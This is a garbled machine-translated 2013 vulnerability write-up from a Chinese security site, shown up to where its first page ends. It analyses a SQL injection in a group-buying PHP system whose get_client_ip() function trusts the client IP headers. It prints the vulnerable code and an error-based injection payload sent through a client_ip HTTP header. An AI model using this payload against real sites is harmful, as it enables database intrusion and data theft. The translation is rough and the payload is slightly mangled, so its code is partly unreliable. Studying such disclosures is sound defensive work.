Easy to want to buy the system through the kill SQL injection vulnerability analysis and exploit-vulnerability warning-the black bar safety net

ID MYHACK58:62201338220
Type myhack58
Reporter 佚名
Modified 2013-04-10T00:00:00


Just open the red and black see J8 friends write a{easy to want to buy the system to the latest version through the kill}article, look at his posted code there is a get_client_ip()function, haha, I guess not filtered, decisive under a set of procedures.

Find get_client_ip()function.

// Get the Client IP address function get_client_ip(){ if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) $ip = getenv("HTTP_CLIENT_IP"); else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) $ip = getenv("HTTP_X_FORWARDED_FOR"); else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) $ip = getenv("REMOTE_ADDR"); else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) $ip = $_SERVER['REMOTE_ADDR']; else $ip = "unknown"; return($ip); }

Sure enough, no filter, looked at a lot of places to use this function.

For example

if($_REQUEST['act'] == 'verify') { $id = intval($_REQUEST['id']); $user_info = $GLOBALS['db']->getRow("select * from ". DB_PREFIX."user where id = ".$ id); if(!$ user_info) { showErr($GLOBALS['lang']['NO_THIS_USER']); } $verify = $_REQUEST['code']; if($user_info['verify'] == $verify) { //Success $_SESSION['user_info'] = $user_info; $GLOBALS['db']->query("update ". DB_PREFIX."user set login_ip = '". get_client_ip()."', login_time= ". get_gmtime().", verify = ",is_effect = 1 where id =".$ user_info['id']); $GLOBALS['db']->query("update ". DB_PREFIX."mail_list set is_effect = 1 where mail_address ='".$ user_info['email']."'"); $GLOBALS['db']->query("update ". DB_PREFIX."mobile_list set is_effect = 1 where mobile ='".$ user_info['mobile']."'"); showSuccess($GLOBALS['lang']['VERIFY_SUCCESS'],0,APP_ROOT."/"); }

Buy system well, in fact, do not look at the code, the landing of these places will certainly use this function.

Decisive, the login in the http head plus a client_ip, value 1 2 7'

See the figure:


Error injection, a simple,

exp: the

Firefox plug-in to increase client_ip

Value of

‘ and (select * from (select count(),concat(floor(rand(0)2),(select user()))a from information_schema. tables group by a)b)#

[1] [2] next